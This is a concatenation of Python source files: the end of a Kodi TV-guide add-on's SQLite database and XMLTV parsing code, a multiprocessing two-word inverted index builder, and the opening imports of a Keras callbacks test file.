                    imported_programs += 1
                    program = item
                    if isinstance(program.channel, Channel):
                        channel = program.channel.id
                    else:
                        channel = program.channel
                    c.execute(
                        'INSERT INTO programs(channel, title, start_date, end_date, description, image_large, image_small, source, updates_id) VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?)',
                        [channel, program.title, program.startDate, program.endDate, program.description,
                         program.imageLarge, program.imageSmall, self.source.KEY, updatesId])
            # channels updated
            c.execute("UPDATE sources SET channels_updated=? WHERE id=?", [datetime.datetime.now(), self.source.KEY])
            self.conn.commit()
            if imported_channels == 0 or imported_programs == 0:
                self.updateFailed = True
        except SourceUpdateCanceledException:
            # force source update on next load
            c.execute('UPDATE sources SET channels_updated=? WHERE id=?', [0, self.source.KEY])
            c.execute("DELETE FROM updates WHERE source=?",
                      [self.source.KEY])  # cascades and deletes associated programs records
            self.conn.commit()
        except Exception:
            import traceback as tb
            import sys
            (etype, value, traceback) = sys.exc_info()
            tb.print_exception(etype, value, traceback)
            try:
                self.conn.rollback()
            except sqlite3.OperationalError:
                pass  # no transaction is active
            try:
                # invalidate cached data
                c.execute('UPDATE sources SET channels_updated=? WHERE id=?', [0, self.source.KEY])
                self.conn.commit()
            except sqlite3.OperationalError:
                pass  # database is locked
            self.updateFailed = True
        finally:
            self.updateInProgress = False
            c.close()

    def getEPGView(self, channelStart, date=None, progress_callback=None,
                   clearExistingProgramList=True):
        """Return [channelStart, channelsOnPage, programs] for one EPG page."""
        if date is None:
            date = datetime.datetime.now()  # per-call default, not def-time
        result = self._invokeAndBlockForResult(self._getEPGView, channelStart, date, progress_callback,
                                               clearExistingProgramList)
        if self.updateFailed:
            raise SourceException('No channels or programs imported')
        return result

    def _getEPGView(self, channelStart, date, progress_callback, clearExistingProgramList):
        self._updateChannelAndProgramListCaches(date, progress_callback, clearExistingProgramList)
        channels = self._getChannelList(onlyVisible=True)
        # Wrap around the channel list at either end.
        if channelStart < 0:
            channelStart = len(channels) - 1
        elif channelStart > len(channels) - 1:
            channelStart = 0
        channelEnd = channelStart + Database.CHANNELS_PER_PAGE
        channelsOnPage = channels[channelStart: channelEnd]
        programs = self._getProgramList(channelsOnPage, date)
        return [channelStart, channelsOnPage, programs]

    def getNextChannel(self, currentChannel):
        # Cyclic successor in the visible channel list.
        channels = self.getChannelList()
        idx = channels.index(currentChannel)
        idx += 1
        if idx > len(channels) - 1:
            idx = 0
        return channels[idx]

    def getPreviousChannel(self, currentChannel):
        # Cyclic predecessor in the visible channel list.
        channels = self.getChannelList()
        idx = channels.index(currentChannel)
        idx -= 1
        if idx < 0:
            idx = len(channels) - 1
        return channels[idx]

    def saveChannelList(self, callback, channelList):
        self.eventQueue.append([self._saveChannelList, callback, channelList])
        self.event.set()

    def _saveChannelList(self, channelList):
        """Upsert the given channels and invalidate the cached channel list."""
        c = self.conn.cursor()
        for idx, channel in enumerate(channelList):
            c.execute(
                'INSERT OR IGNORE INTO channels(id, title, logo, stream_url, visible, weight, source) VALUES(?, ?, ?, ?, ?, (CASE ? WHEN -1 THEN (SELECT COALESCE(MAX(weight)+1, 0) FROM channels WHERE source=?) ELSE ? END), ?)',
                [channel.id, channel.title, channel.logo, channel.streamUrl, channel.visible, channel.weight,
                 self.source.KEY, channel.weight, self.source.KEY])
            if not c.rowcount:
                c.execute(
                    'UPDATE channels SET title=?, logo=?, stream_url=?, visible=?, weight=(CASE ? WHEN -1 THEN weight ELSE ? END) WHERE id=? AND source=?',
                    [channel.title, channel.logo, channel.streamUrl, channel.visible, channel.weight, channel.weight,
                     channel.id, self.source.KEY])
        c.execute("UPDATE sources SET channels_updated=? WHERE id=?", [datetime.datetime.now(), self.source.KEY])
        self.channelList = None
        self.conn.commit()

    def getChannelList(self, onlyVisible=True):
        # Visible channels are cached; the full list is always fetched fresh.
        if not self.channelList or not onlyVisible:
            result = self._invokeAndBlockForResult(self._getChannelList, onlyVisible)
            if not onlyVisible:
                return result
            self.channelList = result
        return self.channelList

    def _getChannelList(self, onlyVisible):
        c = self.conn.cursor()
        channelList = list()
        if onlyVisible:
            c.execute('SELECT * FROM channels WHERE source=? AND visible=? ORDER BY weight', [self.source.KEY, True])
        else:
            c.execute('SELECT * FROM channels WHERE source=? ORDER BY weight', [self.source.KEY])
        for row in c:
            channel = Channel(row['id'], row['title'], row['logo'], row['stream_url'], row['visible'], row['weight'])
            channelList.append(channel)
        c.close()
        return channelList

    def getCurrentProgram(self, channel):
        return self._invokeAndBlockForResult(self._getCurrentProgram, channel)

    def _getCurrentProgram(self, channel):
        """
        @param channel:
        @type channel: source.Channel
        @return: the program airing on *channel* right now, or None
        """
        program = None
        now = datetime.datetime.now()
        c = self.conn.cursor()
        c.execute('SELECT * FROM programs WHERE channel=? AND source=? AND start_date <= ? AND end_date >= ?',
                  [channel.id, self.source.KEY, now, now])
        row = c.fetchone()
        if row:
            program = Program(channel, row['title'], row['start_date'], row['end_date'], row['description'],
                              row['image_large'], row['image_small'])
        c.close()
        return program

    def getNextProgram(self, channel):
        # NOTE(review): despite the parameter name, callers pass a Program
        # here (the worker reads .channel and .endDate) -- confirm.
        return self._invokeAndBlockForResult(self._getNextProgram, channel)

    def _getNextProgram(self, program):
        nextProgram = None
        c = self.conn.cursor()
        c.execute(
            'SELECT * FROM programs WHERE channel=? AND source=? AND start_date >= ? ORDER BY start_date ASC LIMIT 1',
            [program.channel.id, self.source.KEY, program.endDate])
        row = c.fetchone()
        if row:
            nextProgram = Program(program.channel, row['title'], row['start_date'], row['end_date'], row['description'],
                                  row['image_large'], row['image_small'])
        c.close()
        return nextProgram

    def getPreviousProgram(self, channel):
        # NOTE(review): despite the parameter name, callers pass a Program
        # here (the worker reads .channel and .startDate) -- confirm.
        return self._invokeAndBlockForResult(self._getPreviousProgram, channel)

    def _getPreviousProgram(self, program):
        previousProgram = None
        c = self.conn.cursor()
        c.execute(
            'SELECT * FROM programs WHERE channel=? AND source=? AND end_date <= ? ORDER BY start_date DESC LIMIT 1',
            [program.channel.id, self.source.KEY, program.startDate])
        row = c.fetchone()
        if row:
            previousProgram = Program(program.channel, row['title'], row['start_date'], row['end_date'],
                                      row['description'], row['image_large'], row['image_small'])
        c.close()
        return previousProgram

    def _getProgramList(self, channels, startTime):
        """
        @param channels:
        @type channels: list of source.Channel
        @param startTime:
        @type startTime: datetime.datetime
        @return: programs airing on *channels* within two hours of startTime
        """
        endTime = startTime + datetime.timedelta(hours=2)
        programList = list()
        channelMap = dict()
        for ch in channels:
            if ch.id:
                channelMap[ch.id] = ch
        if not channels:
            return []
        channelIds = list(channelMap.keys())
        # Bind the channel ids as parameters; the original spliced them into
        # the SQL string, which broke on quotes in ids.
        placeholders = ', '.join('?' for _ in channelIds)
        c = self.conn.cursor()
        c.execute(
            'SELECT p.*, (SELECT 1 FROM notifications n WHERE n.channel=p.channel AND n.program_title=p.title AND n.source=p.source) AS notification_scheduled FROM programs p WHERE p.channel IN (' + placeholders + ') AND p.source=? AND p.end_date > ? AND p.start_date < ?',
            channelIds + [self.source.KEY, startTime, endTime])
        for row in c:
            program = Program(channelMap[row['channel']], row['title'], row['start_date'], row['end_date'],
                              row['description'], row['image_large'], row['image_small'],
                              row['notification_scheduled'])
            programList.append(program)
        c.close()
        return programList

    def _isProgramListCacheExpired(self, date=None):
        # check if data is up-to-date in database
        if date is None:
            date = datetime.datetime.now()  # per-call default, not def-time
        dateStr = date.strftime('%Y-%m-%d')
        c = self.conn.cursor()
        c.execute('SELECT programs_updated FROM updates WHERE source=? AND date=?', [self.source.KEY, dateStr])
        row = c.fetchone()
        today = datetime.datetime.now()
        expired = row is None or row['programs_updated'].day != today.day
        c.close()
        return expired

    def setCustomStreamUrl(self, channel, stream_url):
        if stream_url is not None:
            self._invokeAndBlockForResult(self._setCustomStreamUrl, channel, stream_url)
            # no result, but block until operation is done

    def _setCustomStreamUrl(self, channel, stream_url):
        if stream_url is not None:
            c = self.conn.cursor()
            # Replace any previous override for this channel.
            c.execute("DELETE FROM custom_stream_url WHERE channel=?", [channel.id])
            c.execute("INSERT INTO custom_stream_url(channel, stream_url) VALUES(?, ?)",
                      [channel.id, stream_url.decode('utf-8', 'ignore')])
            self.conn.commit()
            c.close()

    def getCustomStreamUrl(self, channel):
        return self._invokeAndBlockForResult(self._getCustomStreamUrl, channel)

    def _getCustomStreamUrl(self, channel):
        c = self.conn.cursor()
        c.execute("SELECT stream_url FROM custom_stream_url WHERE channel=?", [channel.id])
        stream_url = c.fetchone()
        c.close()
        if stream_url:
            return stream_url[0]
        else:
            return None

    def deleteCustomStreamUrl(self, channel):
        self.eventQueue.append([self._deleteCustomStreamUrl, None, channel])
        self.event.set()

    def _deleteCustomStreamUrl(self, channel):
        c = self.conn.cursor()
        c.execute("DELETE FROM custom_stream_url WHERE channel=?", [channel.id])
        self.conn.commit()
        c.close()

    def getStreamUrl(self, channel):
        # A user-set override wins over the channel's own stream URL.
        customStreamUrl = self.getCustomStreamUrl(channel)
        if customStreamUrl:
            customStreamUrl = customStreamUrl.encode('utf-8', 'ignore')
            return customStreamUrl
        elif channel.isPlayable():
            streamUrl = channel.streamUrl.encode('utf-8', 'ignore')
            return streamUrl
        return None

    @staticmethod
    def adapt_datetime(ts):
        # http://docs.python.org/2/library/sqlite3.html#registering-an-adapter-callable
        return time.mktime(ts.timetuple())

    @staticmethod
    def convert_datetime(ts):
        try:
            return datetime.datetime.fromtimestamp(float(ts))
        except ValueError:
            return None

    def _createTables(self):
        """Create or migrate the schema; raise DatabaseSchemaException on failure."""
        c = self.conn.cursor()
        try:
            c.execute('SELECT major, minor, patch FROM version')
            (major, minor, patch) = c.fetchone()
            version = [major, minor, patch]
        except sqlite3.OperationalError:
            version = [0, 0, 0]
        try:
            if version < [1, 3, 0]:
                c.execute('CREATE TABLE IF NOT EXISTS custom_stream_url(channel TEXT, stream_url TEXT)')
                c.execute('CREATE TABLE version (major INTEGER, minor INTEGER, patch INTEGER)')
                c.execute('INSERT INTO version(major, minor, patch) VALUES(1, 3, 0)')
                # For caching data
                c.execute('CREATE TABLE sources(id TEXT PRIMARY KEY, channels_updated TIMESTAMP)')
                c.execute(
                    'CREATE TABLE updates(id INTEGER PRIMARY KEY, source TEXT, date TEXT, programs_updated TIMESTAMP)')
                c.execute(
                    'CREATE TABLE channels(id TEXT, title TEXT, logo TEXT, stream_url TEXT, source TEXT, visible BOOLEAN, weight INTEGER, PRIMARY KEY (id, source), FOREIGN KEY(source) REFERENCES sources(id) ON DELETE CASCADE)')
                c.execute(
                    'CREATE TABLE programs(channel TEXT, title TEXT, start_date TIMESTAMP, end_date TIMESTAMP, description TEXT, image_large TEXT, image_small TEXT, source TEXT, updates_id INTEGER, FOREIGN KEY(channel, source) REFERENCES channels(id, source) ON DELETE CASCADE, FOREIGN KEY(updates_id) REFERENCES updates(id) ON DELETE CASCADE)')
                c.execute('CREATE INDEX program_list_idx ON programs(source, channel, start_date, end_date)')
                c.execute('CREATE INDEX start_date_idx ON programs(start_date)')
                c.execute('CREATE INDEX end_date_idx ON programs(end_date)')
                # For active setting
                c.execute('CREATE TABLE settings(key TEXT PRIMARY KEY, value TEXT)')
                # For notifications
                c.execute(
                    "CREATE TABLE notifications(channel TEXT, program_title TEXT, source TEXT, FOREIGN KEY(channel, source) REFERENCES channels(id, source) ON DELETE CASCADE)")
            if version < [1, 3, 1]:
                # Recreate tables with FOREIGN KEYS as DEFERRABLE INITIALLY DEFERRED
                c.execute('UPDATE version SET major=1, minor=3, patch=1')
                c.execute('DROP TABLE channels')
                c.execute('DROP TABLE programs')
                c.execute(
                    'CREATE TABLE channels(id TEXT, title TEXT, logo TEXT, stream_url TEXT, source TEXT, visible BOOLEAN, weight INTEGER, PRIMARY KEY (id, source), FOREIGN KEY(source) REFERENCES sources(id) ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED)')
                c.execute(
                    'CREATE TABLE programs(channel TEXT, title TEXT, start_date TIMESTAMP, end_date TIMESTAMP, description TEXT, image_large TEXT, image_small TEXT, source TEXT, updates_id INTEGER, FOREIGN KEY(channel, source) REFERENCES channels(id, source) ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, FOREIGN KEY(updates_id) REFERENCES updates(id) ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED)')
                c.execute('CREATE INDEX program_list_idx ON programs(source, channel, start_date, end_date)')
                c.execute('CREATE INDEX start_date_idx ON programs(start_date)')
                c.execute('CREATE INDEX end_date_idx ON programs(end_date)')
            # make sure we have a record in sources for this Source
            c.execute("INSERT OR IGNORE INTO sources(id, channels_updated) VALUES(?, ?)", [self.source.KEY, 0])
            self.conn.commit()
            c.close()
        except sqlite3.OperationalError as ex:
            # `except X, ex` is Python-2-only syntax; `as` works on 2.6+.
            raise DatabaseSchemaException(ex)

    def addNotification(self, program):
        self._invokeAndBlockForResult(self._addNotification, program)
        # no result, but block until operation is done

    def _addNotification(self, program):
        """
        @type program: source.program
        """
        c = self.conn.cursor()
        c.execute("INSERT INTO notifications(channel, program_title, source) VALUES(?, ?, ?)",
                  [program.channel.id, program.title, self.source.KEY])
        self.conn.commit()
        c.close()

    def removeNotification(self, program):
        self._invokeAndBlockForResult(self._removeNotification, program)
        # no result, but block until operation is done

    def _removeNotification(self, program):
        """
        @type program: source.program
        """
        c = self.conn.cursor()
        c.execute("DELETE FROM notifications WHERE channel=? AND program_title=? AND source=?",
                  [program.channel.id, program.title, self.source.KEY])
        self.conn.commit()
        c.close()

    def getNotifications(self, daysLimit=2):
        return self._invokeAndBlockForResult(self._getNotifications, daysLimit)

    def _getNotifications(self, daysLimit):
        """Return (channel title, program title, start) rows due within daysLimit."""
        start = datetime.datetime.now()
        end = start + datetime.timedelta(days=daysLimit)
        c = self.conn.cursor()
        c.execute(
            "SELECT DISTINCT c.title, p.title, p.start_date FROM notifications n, channels c, programs p WHERE n.channel = c.id AND p.channel = c.id AND n.program_title = p.title AND n.source=? AND p.start_date >= ? AND p.end_date <= ?",
            [self.source.KEY, start, end])
        programs = c.fetchall()
        c.close()
        return programs

    def isNotificationRequiredForProgram(self, program):
        return self._invokeAndBlockForResult(self._isNotificationRequiredForProgram, program)

    def _isNotificationRequiredForProgram(self, program):
        """
        @type program: source.program
        """
        c = self.conn.cursor()
        c.execute("SELECT 1 FROM notifications WHERE channel=? AND program_title=? AND source=?",
                  [program.channel.id, program.title, self.source.KEY])
        result = c.fetchone()
        c.close()
        return result

    def clearAllNotifications(self):
        self._invokeAndBlockForResult(self._clearAllNotifications)
        # no result, but block until operation is done

    def _clearAllNotifications(self):
        c = self.conn.cursor()
        c.execute('DELETE FROM notifications')
        self.conn.commit()
        c.close()
class Source(object):
    """Abstract provider of guide data (Channel and Program objects)."""

    def getDataFromExternal(self, date, progress_callback=None):
        """
        Retrieve data from external as a list or iterable. Data may contain both Channel and Program objects.
        The source may choose to ignore the date parameter and return all data available.
        @param date: the date to retrieve the data for
        @param progress_callback:
        @return:
        """
        return None

    def isUpdated(self, channelsLastUpdated, programsLastUpdated):
        # Stale whenever either timestamp is missing or from a previous day.
        today = datetime.datetime.now()
        for lastUpdated in (channelsLastUpdated, programsLastUpdated):
            if lastUpdated is None or lastUpdated.day != today.day:
                return True
        return False
class XMLTVSource(Source):
    """Guide source backed by an XMLTV file (fetched FTV file or a user-supplied local file)."""

    PLUGIN_DATA = xbmc.translatePath(os.path.join('special://profile', 'addon_data', 'script.ftvguide'))
    KEY = 'xmltv'
    INI_TYPE_FTV = 0
    INI_TYPE_CUSTOM = 1
    INI_FILE = 'addons.ini'
    LOGO_SOURCE_FTV = 0
    LOGO_SOURCE_CUSTOM = 1

    def __init__(self, addon):
        """Read addon settings and fetch the XMLTV/ini files when required.

        @param addon: the Kodi addon object providing getSetting()
        @raise SourceNotConfiguredException: when no usable XMLTV file exists
        """
        gType = GuideTypes()
        self.needReset = False
        self.fetchError = False
        self.xmltvType = int(addon.getSetting('xmltv.type'))
        self.xmltvInterval = int(addon.getSetting('xmltv.interval'))
        self.logoSource = int(addon.getSetting('logos.source'))
        self.addonsType = int(addon.getSetting('addons.ini.type'))
        # make sure the folder in the user's profile exists or create it!
        if not os.path.exists(XMLTVSource.PLUGIN_DATA):
            os.makedirs(XMLTVSource.PLUGIN_DATA)
        if self.logoSource == XMLTVSource.LOGO_SOURCE_FTV:
            self.logoFolder = MAIN_URL + 'logos/'
        else:
            self.logoFolder = str(addon.getSetting('logos.folder'))
        if self.xmltvType == gType.CUSTOM_FILE_ID:
            self.xmltvFile = str(addon.getSetting('xmltv.file'))  # uses local file provided by user!
        else:
            self.xmltvFile = self.updateLocalFile(gType.getGuideDataItem(self.xmltvType, gType.GUIDE_FILE), addon)
        # make sure the ini file is fetched as well if necessary
        if self.addonsType == XMLTVSource.INI_TYPE_FTV:
            self.updateLocalFile(XMLTVSource.INI_FILE, addon)
        if not self.xmltvFile or not xbmcvfs.exists(self.xmltvFile):
            raise SourceNotConfiguredException()

    def updateLocalFile(self, name, addon):
        """Fetch `name` into the plugin data folder; flag a DB reset when guide data changed.

        @return: the local path the file was (or would have been) fetched to
        """
        path = os.path.join(XMLTVSource.PLUGIN_DATA, name)
        fetcher = FileFetcher(name, addon)
        retVal = fetcher.fetchFile()
        # FIX: '<>' is Python 2-only syntax; '!=' is equivalent and portable.
        if retVal == fetcher.FETCH_OK and name != XMLTVSource.INI_FILE:
            self.needReset = True
        elif retVal == fetcher.FETCH_ERROR:
            xbmcgui.Dialog().ok(strings(FETCH_ERROR_TITLE), strings(FETCH_ERROR_LINE1), strings(FETCH_ERROR_LINE2))
        return path

    def getDataFromExternal(self, date, progress_callback=None):
        """Stream-parse the XMLTV file; returns a generator of Channel/Program objects."""
        f = FileWrapper(self.xmltvFile)
        context = ElementTree.iterparse(f, events=("start", "end"))
        size = f.size
        return self.parseXMLTV(context, f, size, self.logoFolder, progress_callback)

    def isUpdated(self, channelsLastUpdated, programLastUpdate):
        """Data is stale when never loaded, the file is missing, or it changed on disk."""
        if channelsLastUpdated is None or not xbmcvfs.exists(self.xmltvFile):
            return True
        stat = xbmcvfs.Stat(self.xmltvFile)
        fileUpdated = datetime.datetime.fromtimestamp(stat.st_mtime())
        return fileUpdated > channelsLastUpdated

    def parseXMLTVDate(self, origDateString):
        """Parse an XMLTV timestamp ('YYYYmmddHHMMSS +HHMM') into local time.

        Normalizes to UTC using the embedded offset, then applies the local
        timezone offset. Returns None when the string has no space separator
        or an unexpected number of parts.
        """
        if origDateString.find(' ') != -1:
            # get timezone information
            # FIX: offSign was previously unbound when no 5-char offset was
            # present, raising UnboundLocalError at the comparison below.
            offSign = None
            dateParts = origDateString.split()
            if len(dateParts) == 2:
                dateString = dateParts[0]
                offset = dateParts[1]
                if len(offset) == 5:
                    offSign = offset[0]
                    offHrs = int(offset[1:3])
                    offMins = int(offset[-2:])
                    td = datetime.timedelta(minutes=offMins, hours=offHrs)
                else:
                    td = datetime.timedelta(seconds=0)
            elif len(dateParts) == 1:
                dateString = dateParts[0]
                td = datetime.timedelta(seconds=0)
            else:
                return None
            # normalize the given time to UTC by applying the timedelta provided in the timestamp
            xbmc.log('[script.ftvguide] Date to normalize: ' + dateString, xbmc.LOGDEBUG)
            try:
                t_tmp = datetime.datetime.strptime(dateString, '%Y%m%d%H%M%S')
            except TypeError:
                # strptime can raise TypeError in some embedded interpreters; fall back to time.strptime
                t_tmp = datetime.datetime.fromtimestamp(time.mktime(time.strptime(dateString, '%Y%m%d%H%M%S')))
            if offSign == '+':
                t = t_tmp - td
            elif offSign == '-':
                t = t_tmp + td
            else:
                t = t_tmp
            # get the local timezone offset in seconds
            is_dst = time.daylight and time.localtime().tm_isdst > 0
            utc_offset = - (time.altzone if is_dst else time.timezone)
            td_local = datetime.timedelta(seconds=utc_offset)
            t = t + td_local
            xbmc.log('[script.ftvguide] Import Time adjusted from: ' + str(t_tmp) + ' to: ' + str(t), xbmc.LOGDEBUG)
            return t
        else:
            return None

    def parseXMLTV(self, context, f, size, logoFolder, progress_callback):
        """Generator over XMLTV 'programme' and 'channel' elements.

        Reports progress every 500 parsed elements via progress_callback and
        raises SourceUpdateCanceledException when the callback returns falsy.
        """
        # FIX: context.next() is Python 2-only; next(context) works on 2.6+ and 3.x.
        event, root = next(context)
        elements_parsed = 0
        for event, elem in context:
            if event == "end":
                result = None
                if elem.tag == "programme":
                    channel = elem.get("channel")
                    description = elem.findtext("desc")
                    iconElement = elem.find("icon")
                    icon = None
                    if iconElement is not None:
                        icon = iconElement.get("src")
                    if not description:
                        description = strings(NO_DESCRIPTION)
                    result = Program(channel, elem.findtext('title'), self.parseXMLTVDate(elem.get('start')),
                                     self.parseXMLTVDate(elem.get('stop')), description, imageSmall=icon)
                elif elem.tag == "channel":
                    id = elem.get("id")
                    title = elem.findtext("display-name")
                    logo = None
                    if logoFolder:
                        logoFile = os.path.join(logoFolder, title + '.png')
                        if (self.logoSource == XMLTVSource.LOGO_SOURCE_FTV):
                            logo = logoFile.replace(' ', '%20')  # needed due to fetching from a server!
                        elif xbmcvfs.exists(logoFile):
                            logo = logoFile  # local file instead of remote!
                    streamElement = elem.find("stream")
                    streamUrl = None
                    if streamElement is not None:
                        streamUrl = streamElement.text
                    visible = elem.get("visible")
                    # only an explicit visible="0" hides the channel
                    if visible == "0":
                        visible = False
                    else:
                        visible = True
                    result = Channel(id, title, logo, streamUrl, visible)
                if result:
                    elements_parsed += 1
                    if progress_callback and elements_parsed % 500 == 0:
                        if not progress_callback(100.0 / size * f.tell()):
                            raise SourceUpdateCanceledException()
                    yield result
            root.clear()
        f.close()
class FileWrapper(object):
    """Adapts an xbmcvfs.File to the minimal file protocol ElementTree.iterparse
    needs (read/close), while tracking consumed bytes for progress reporting."""

    def __init__(self, filename):
        self.vfsfile = xbmcvfs.File(filename)
        self.size = self.vfsfile.size()
        self.bytesRead = 0

    def close(self):
        self.vfsfile.close()

    def read(self, byteCount):
        # NOTE(review): counts *requested* bytes, not bytes actually returned,
        # so tell() may overshoot on the final short read — presumably fine
        # since it is only used for progress percentages; confirm.
        self.bytesRead += byteCount
        return self.vfsfile.read(byteCount)

    def tell(self):
        return self.bytesRead
def instantiateSource():
    """Factory: build the configured XMLTV guide source for the global ADDON."""
    return XMLTVSource(ADDON)
|
two_word_index.py | import os
from _queue import Empty
from multiprocessing import Queue, Event, Process, Pool
from threading import Thread
from sortedcontainers import SortedDict
from common.constants import PATH_TO_DICT, PATH_TO_RESULT_DIR, \
PATH_TO_LIST_OF_FILES, BYTE, PATH_TO_DATA_DIR
from common.exceptions import NotSupportedExtensionException
from dictionary.decoder import get_file_reader_by_extension
from dictionary.utils import get_list_of_files, write_doc_ids_to_file, \
write_dictionary_to_file, write_token_list_to_file, \
add_unfinished_part_from_prev_chunk, get_tokens_from_chunk
# Tuning knobs for the producer/consumer indexing pipeline.
CHUNK_SIZE = 4 * BYTE
QUEUE_MAX_SIZE = 10000  # NOTE(review): appears unused in this module — confirm before removing
QUEUE_MIN_SIZE = 10000  # NOTE(review): appears unused in this module — confirm before removing
CHUNK_WORKERS_NUM = 6  # processes that split raw text chunks into tokens
TOKEN_WORKERS_NUM = 3  # threads that reduce tokens into the lexicon
# Shared pipeline state: raw chunks flow through chunk_queue, parsed tokens
# through token_queue.
chunk_queue = Queue()
token_queue = Queue()
file_job_done = Event()  # set once every document has been enqueued
# Each chunk worker puts one sentinel here when it drains its queue; a full
# queue means all chunk workers have finished.
token_job_done = Queue(maxsize=CHUNK_WORKERS_NUM)
inverted_index = SortedDict()  # two-word token -> set of doc ids
lexicon = dict()  # doc id -> SortedDict(token -> [positions])
def retrieve_tokens(chunk_start, chunk) -> list:
    """
    Receives chunk from the queue. Then replaces punctuation with
    spaces and retrieves tokens with their positions in text.

    :param chunk_start: absolute offset of the chunk within the document,
        used so token positions are document-relative
    :param chunk: the raw text of one chunk
    :return: list of (position, token) pairs extracted from the chunk
    """
    tokens = get_tokens_from_chunk(chunk, chunk_start)
    return tokens
def notify_on_finish() -> None:
    """Send an event that the worker has finished reading from the queue.

    Puts a sentinel into token_job_done; when that queue is full, all
    chunk workers are done and token reducers may stop.
    """
    token_job_done.put(0)
    print("Chunk process down")
def get_chunk_from_queue_and_process() -> bool:
    """
    Get retrieved tokens from a received chunk and put them into the
    token queue.

    :return: True - keep waiting for the next chunk, False - work is done
        (queue drained and the producer signalled completion)
    """
    try:
        file_id, chunk_start, chunk = chunk_queue.get(block=True, timeout=1)
        tokens = retrieve_tokens(chunk_start, chunk)
        token_queue.put((file_id, tokens))
    except Empty:
        # Only stop once the producer says no more chunks will arrive;
        # a transient timeout alone keeps the worker alive.
        if file_job_done.is_set():
            notify_on_finish()
            return False
    return True
def chunk_to_tokens_worker() -> None:
    """
    While queue is not empty during timeout, read chunks from queue
    and split it to tokens. Then put tokens into the queue and wait
    for next chunk.
    """
    # Loop until the processing step reports that the producer is done.
    while get_chunk_from_queue_and_process():
        pass
def get_list_or_add_to_lists(file_id: int) -> dict:
    """Return the per-document token->positions map, creating it on first access."""
    try:
        return lexicon[file_id]
    except KeyError:
        table = SortedDict()
        lexicon[file_id] = table
        return table
def reduce_tokens_to_lexicon() -> None:
    """
    Read parsed tokens with positions in specified documents and map them
    into the two-word inverted index and per-document position lists.

    Runs until the token queue stays empty for the timeout AND all chunk
    workers have signalled completion (token_job_done is full).
    """
    def append_token_to_dict():
        # Record that this two-word token occurs in file_id.
        if two_word_token not in inverted_index:
            inverted_index[two_word_token] = set()
        inverted_index[two_word_token].add(file_id)

    def append_token_to_list():
        # Record the single token's position within the current document.
        if token not in curr_word_position_list:
            curr_word_position_list[token] = []
        curr_word_position_list[token].append(position)

    # NOTE(review): last_token is never reset between queue items, so a
    # two-word pair can span two different chunks — or even two different
    # documents — and queue ordering across workers is not deterministic.
    # Confirm this is acceptable for the index semantics.
    last_token = None
    while True:
        try:
            file_id, tokens = token_queue.get(block=True, timeout=1)
            curr_word_position_list = \
                get_list_or_add_to_lists(file_id)
            for position, token in tokens:
                if last_token is not None:
                    two_word_token = f'{last_token} {token}'
                    append_token_to_dict()
                    append_token_to_list()
                last_token = token
        except Empty:
            print("Failed to read from token queue")
            if token_job_done.full():
                print('Worker finished')
                return
def read_document_and_put_into_queue(file_path: str, file_id: int) -> None:
    """
    Read document chunk by chunk and put them into the queue.

    Words cut in half at a chunk boundary are carried over into the next
    chunk via `unfinished_part` so no token is split.

    :param file_path: Path to document which will be read
    :param file_id: generated docID of the document
    """
    chunk_start = 0
    unfinished_part = ''
    with get_file_reader_by_extension(file_path) as file:
        chunk = file.read_chunk()
        while chunk:
            actual_chunk, unfinished_part = \
                add_unfinished_part_from_prev_chunk(chunk, unfinished_part)
            chunk_queue.put((file_id, chunk_start, actual_chunk))
            chunk = file.read_chunk()
            # +1 presumably accounts for the separator consumed between
            # chunks — TODO confirm against add_unfinished_part_from_prev_chunk
            chunk_start += len(actual_chunk) + 1
    # Flush whatever trailing fragment remained after the last chunk.
    if unfinished_part:
        chunk_queue.put((file_id, chunk_start, unfinished_part))
def read_document_and_put_tokens_to_queue(file_path, file_id) -> bool:
    """Try to stream one document into the chunk queue.

    :return: False when the file's extension is unsupported, True otherwise.
    """
    try:
        read_document_and_put_into_queue(file_path, file_id)
    except NotSupportedExtensionException as error:
        print(error.message)
        return False
    else:
        return True
def process_documents() -> None:
    """
    1. Discover files in the directory and give them a unique ID.
    2. Read each file if it is a document and the extension is
       supported by the parser. Put read parts into the queue to parse
       text into the tokens.
    3. Save document IDs to a file on disk.
    """
    documents_with_id = dict()
    for file_id, file_name in get_list_of_files():
        file_path = os.path.join(PATH_TO_DATA_DIR, file_name)
        # Skip directories and other non-regular entries.
        if not os.path.isfile(file_path):
            continue
        # Only remember documents that were actually parseable.
        if read_document_and_put_tokens_to_queue(file_path, file_id):
            documents_with_id[file_path] = file_id
    # Tell the chunk workers that no more chunks will be produced.
    file_job_done.set()
    print('Documents are read')
    write_doc_ids_to_file(documents_with_id, PATH_TO_LIST_OF_FILES)
def main() -> None:
    """
    Algorithm:
    1. Producer reads documents -> puts data into the queue ->
       adds document to the dictionary <doc_id, file_name>
    2. First-layer consumers read the data queue -> tokenize the text
       -> put into reduce queue
    3. Reducers merge tokens into local lexicons -> put mini lexicons
       to reduce queue 2
    4. Global reducer reduces mini lexicons to global lexicon and then
       writes the result into files.
    """
    producer = Process(target=process_documents)
    producer.start()
    # NOTE(review): the pool and producer are never joined/closed here;
    # only the reducer threads are joined — confirm shutdown is intentional.
    chunk_workers = Pool(CHUNK_WORKERS_NUM)
    for _ in range(CHUNK_WORKERS_NUM):
        chunk_workers.apply_async(chunk_to_tokens_worker)
    threads = []
    for _ in range(TOKEN_WORKERS_NUM):
        t = Thread(target=reduce_tokens_to_lexicon)
        threads.append(t)
        t.start()
    # Wait for all reducer threads to finish building the in-memory index.
    [t.join() for t in threads]
    print('dictionary created')
    # Persist the global inverted index in a separate process while the
    # main process writes the per-document position lists.
    write_lexicon_process = \
        Process(target=write_dictionary_to_file,
                args=(inverted_index, PATH_TO_DICT),
                kwargs=dict(is_lexicon=True, lexicon=lexicon))
    write_lexicon_process.start()
    for file_id, word_position_list in lexicon.items():
        path_to_result_file = \
            os.path.join(PATH_TO_RESULT_DIR, str(file_id))
        write_token_list_to_file(word_position_list, path_to_result_file)
|
callbacks_test.py | import os
import multiprocessing
import numpy as np
import pytest
from numpy.testing import assert_allclose
from csv import reader
from csv import Sniffer
import shutil
from collections import defaultdict
from keras import optimizers
from keras import initializers
from keras import callbacks
from keras.models import Sequential, Model
from keras.layers import Input, Dense, Dropout, add, dot, Lambda, Layer
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import GlobalAveragePooling1D
from keras.layers import GlobalAveragePooling2D
